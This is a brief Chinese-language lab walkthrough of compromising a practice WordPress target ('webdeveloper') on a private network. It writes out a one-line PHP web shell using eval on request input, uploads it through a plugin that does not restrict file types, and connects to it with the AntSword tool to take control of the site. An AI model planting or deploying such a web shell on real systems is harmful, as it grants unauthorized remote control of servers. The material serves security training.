利用一句话木马夺取目标网站的shell

实验准备

目标网站：webdeveloper

工具：一句话木马（shell.php）、蚁剑

实验环境：物理机、虚拟机kali

一、在kali桌面创建一个shell.php文件，写入一句话木马，如图

<?php
@eval($_REQUEST["shell"]);
?>

二、将木马上传webdeveloper网站

利用插件上传不限制文件的漏洞，选择木马文件并上传，显示"not be installed"没关系，打开网页目录：http://192.168.194.134/wp-content/uploads/2025/12/

可以发现shell.php已经下载到网页的uploads目录里：

三、在物理机利用蚁剑连接目标网站

成功连接并控制目标网站，接下来可以随意查看文件，完成目标。